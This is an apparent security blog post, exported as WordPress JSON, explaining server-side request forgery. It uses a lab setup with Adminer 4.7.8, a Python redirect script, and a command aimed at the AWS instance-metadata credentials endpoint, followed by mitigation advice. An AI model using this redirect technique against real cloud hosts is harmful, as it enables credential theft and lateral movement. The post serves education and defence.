{"id":199,"date":"2023-01-08T02:02:34","date_gmt":"2023-01-08T02:02:34","guid":{"rendered":"https:\/\/vasanthselvaraj.com\/?p=199"},"modified":"2023-01-08T02:02:38","modified_gmt":"2023-01-08T02:02:38","slug":"ssrf-server-side-request-forgery","status":"publish","type":"post","link":"https:\/\/vasanthselvaraj.com\/?p=199","title":{"rendered":"SSRF – Server Side Request Forgery"},"content":{"rendered":"\n

What is SSRF?<\/h2>\n\n\n\n

SSRF is server side request forgery. It allows bad actors to access internal sites outside of your internal network. SSRF vulnerability is one of the common web applications vulnerability exploited and OWASP top 10 web application vulnerability.<\/p>\n\n\n\n

Why it’s dangerous?<\/h2>\n\n\n\n

If you are not following ZTNA (Zero Trust Network Access) model and the applications inside your internal network most likely will trust the connections from the network. Adversaries uses that weakness to access the apps and the data outside of the network. For e.g. AWS instance metadata 169.254.169.254 may have instance credentials can be accessible outside of the intended network. Obviously AWS has a mitigation to protect against instance metadata exfiltration. Refer this AWS blog<\/a> for more details.<\/p>\n\n\n\n

How to exploit SSRF?<\/h2>\n\n\n\n

I am going to explain SSRF vulnerability using adminer v4.7.8 application and read AWS ec2 instance credentials. More details about this vulnerability can be found here<\/a>.<\/p>\n\n\n\n

redirect.py is python program listens on port 9001 and redirects the request to instance meta-data ec2 credentials<\/p>\n\n\n\n

#!\/usr\/bin\/env python3\n\nimport sys\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nimport logging\n\nif len(sys.argv)-1 != 2:\n    print(\"\"\"\nUsage: {} <port_number> <url>\n    \"\"\".format(sys.argv[0]))\n    sys.exit()\n\nclass Redirect(BaseHTTPRequestHandler):\n   def do_GET(self):\n       self.send_response(302)\n       self.send_header('Location', sys.argv[2])\n       self.end_headers()\n\n   def do_POST(self):\n       content_length = int(self.headers['Content-Length']) # <--- Gets the size of data\n       post_data = self.rfile.read(content_length) # <--- Gets the data itself\n       logging.info(\"POST request,\\nPath: %s\\nHeaders:\\n%s\\n\\nBody:\\n%s\\n\",\n               str(self.path), str(self.headers), post_data.decode('utf-8'))\n\n       self._set_response()\n       self.wfile.write(\"POST request for {}\".format(self.path).encode('utf-8'))\n\nHTTPServer((\"\", int(sys.argv[1])), Redirect).serve_forever()<\/code><\/pre>\n\n\n\n
python redirect_3.py 9001 http:\/\/169.254.169.254\/latest\/meta-data\/identity-credentials\/ec2\/security-credentials\/ec2-instance<\/code><\/p>\n\n\n\n
Python redirect_3.py listens on port 9001 is not accessible outside. And the adminer ssrf vulnerable application running on the same network so using the vulnerable application we can extract the ec2 instance credentials. Adversaries uses the compromised credentials to move laterally or escalate privileges.<\/p>\n\n\n\n
Start the adminer docker container of v4.7.8 using below command<\/p>\n\n\n\n
docker run -p 8081:8080 adminer:4.7.8<\/code><\/p>\n\n\n\n
Exploit the vulnerability in Server field<\/p>\n\n\n\n
\"\"
Adminer listening on port 4.7.8<\/figcaption><\/figure>\n\n\n\n
\"\"
Exploited SSRF vulnerability<\/figcaption><\/figure>\n\n\n\n
As you can see using SSRF vulnerability I can able to access the internal servers and most importantly AWS instance credentials.<\/p>\n\n\n\n
How to prevent or detect SSRF ?<\/h2>\n\n\n\n
Adding the defence in depth is way to go to prevent any kind of vulnerability<\/p>\n\n\n\n
    \n
  1. Keep the software up to-date  and patch all the vulnerabilities. In this case, Adminer is fixed the SSRF vulnerability in 4.8.<\/li>\n\n\n\n
  2. Do not allow unauthenticated access to internal apps. Follow the zero trust model and get as much as signals for the application to provide access.<\/li>\n\n\n\n
  3. Amazon Guardduty can detect EC2 instance credentials exfiltration<\/li>\n\n\n\n
  4. Some Web application Firewall vendors may prevent SSRF attack but the prevention of SSRF is difficult compared to other common attacks against web like SQL injection, XSS and so on.<\/li>\n\n\n\n
  5. Disable HTTP redirection<\/li>\n<\/ol>\n\n\n\n
    OWASP Top 10 have other techniques to prevent and detect SSRF<\/a> <\/p>\n\n\n\n
    Conclusion<\/h2>\n\n\n\n
    SSRF attack is one of the OWASP Top ten web attack and the impact is depends on what kind of sensitive information can adversaries able to exfiltrate. Defence in depth is strategy to prevent those attacks.<\/p>\n\n\n\n
    References<\/h2>\n\n\n\n
    https:\/\/portswigger.net\/web-security\/ssrf<\/a><\/p>\n\n\n\n
    https:\/\/owasp.org\/Top10\/A10_2021-Server-Side_Request_Forgery_%28SSRF%29\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
    What is SSRF? SSRF is server side request forgery. It allows bad actors to access internal sites outside of your internal network. SSRF vulnerability is one of the common web applications vulnerability exploited and OWASP top 10 web application vulnerability. Why it’s dangerous? If you are not following ZTNA (Zero Trust Network Access) model and…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_newsletter_tier_id":0},"categories":[4],"tags":[],"yoast_head":"\nSSRF - Server Side Request Forgery - Vasanth Selvaraj<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/vasanthselvaraj.com\/?p=199\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SSRF - Server Side Request Forgery - Vasanth Selvaraj\" \/>\n<meta property=\"og:description\" content=\"What is SSRF? SSRF is server side request forgery. It allows bad actors to access internal sites outside of your internal network. SSRF vulnerability is one of the common web applications vulnerability exploited and OWASP top 10 web application vulnerability. Why it’s dangerous? If you are not following ZTNA (Zero Trust Network Access) model and...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/vasanthselvaraj.com\/?p=199\" \/>\n<meta property=\"og:site_name\" content=\"Vasanth Selvaraj\" \/>\n<meta property=\"article:published_time\" content=\"2023-01-08T02:02:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-01-08T02:02:38+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/vasanthselvaraj.com\/wp-content\/uploads\/2023\/01\/image-1024x499.png\" \/>\n<meta name=\"author\" content=\"VS\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"VS\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/vasanthselvaraj.com\/?p=199\",\"url\":\"https:\/\/vasanthselvaraj.com\/?p=199\",\"name\":\"SSRF - Server Side Request Forgery - Vasanth Selvaraj\",\"isPartOf\":{\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#website\"},\"datePublished\":\"2023-01-08T02:02:34+00:00\",\"dateModified\":\"2023-01-08T02:02:38+00:00\",\"author\":{\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/4f1389c368b6d56abbf122ef1ffddb0d\"},\"breadcrumb\":{\"@id\":\"https:\/\/vasanthselvaraj.com\/?p=199#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/vasanthselvaraj.com\/?p=199\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/vasanthselvaraj.com\/?p=199#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/box2411.temp.domains\/~vasselva\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SSRF – Server Side Request Forgery\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#website\",\"url\":\"https:\/\/box2411.temp.domains\/~vasselva\/\",\"name\":\"Vasanth Selvaraj\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/box2411.temp.domains\/~vasselva\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/4f1389c368b6d56abbf122ef1ffddb0d\",\"name\":\"VS\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f363d6f3a44a96f83133417d14b78c63?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f363d6f3a44a96f83133417d14b78c63?s=96&d=mm&r=g\",\"caption\":\"VS\"},\"url\":\"https:\/\/vasanthselvaraj.com\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SSRF - Server Side Request Forgery - Vasanth Selvaraj","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/vasanthselvaraj.com\/?p=199","og_locale":"en_US","og_type":"article","og_title":"SSRF - Server Side Request Forgery - Vasanth Selvaraj","og_description":"What is SSRF? SSRF is server side request forgery. It allows bad actors to access internal sites outside of your internal network. SSRF vulnerability is one of the common web applications vulnerability exploited and OWASP top 10 web application vulnerability. Why it’s dangerous? If you are not following ZTNA (Zero Trust Network Access) model and...","og_url":"https:\/\/vasanthselvaraj.com\/?p=199","og_site_name":"Vasanth Selvaraj","article_published_time":"2023-01-08T02:02:34+00:00","article_modified_time":"2023-01-08T02:02:38+00:00","og_image":[{"url":"http:\/\/vasanthselvaraj.com\/wp-content\/uploads\/2023\/01\/image-1024x499.png"}],"author":"VS","twitter_card":"summary_large_image","twitter_misc":{"Written by":"VS","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/vasanthselvaraj.com\/?p=199","url":"https:\/\/vasanthselvaraj.com\/?p=199","name":"SSRF - Server Side Request Forgery - Vasanth Selvaraj","isPartOf":{"@id":"https:\/\/box2411.temp.domains\/~vasselva\/#website"},"datePublished":"2023-01-08T02:02:34+00:00","dateModified":"2023-01-08T02:02:38+00:00","author":{"@id":"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/4f1389c368b6d56abbf122ef1ffddb0d"},"breadcrumb":{"@id":"https:\/\/vasanthselvaraj.com\/?p=199#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/vasanthselvaraj.com\/?p=199"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/vasanthselvaraj.com\/?p=199#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/box2411.temp.domains\/~vasselva"},{"@type":"ListItem","position":2,"name":"SSRF – Server Side Request Forgery"}]},{"@type":"WebSite","@id":"https:\/\/box2411.temp.domains\/~vasselva\/#website","url":"https:\/\/box2411.temp.domains\/~vasselva\/","name":"Vasanth Selvaraj","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/box2411.temp.domains\/~vasselva\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/4f1389c368b6d56abbf122ef1ffddb0d","name":"VS","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/box2411.temp.domains\/~vasselva\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f363d6f3a44a96f83133417d14b78c63?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f363d6f3a44a96f83133417d14b78c63?s=96&d=mm&r=g","caption":"VS"},"url":"https:\/\/vasanthselvaraj.com\/?author=1"}]}},"jetpack_sharing_enabled":true,"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/posts\/199"}],"collection":[{"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=199"}],"version-history":[{"count":5,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/posts\/199\/revisions"}],"predecessor-version":[{"id":209,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=\/wp\/v2\/posts\/199\/revisions\/209"}],"wp:attachment":[{"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=199"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=199"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/vasanthselvaraj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=199"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}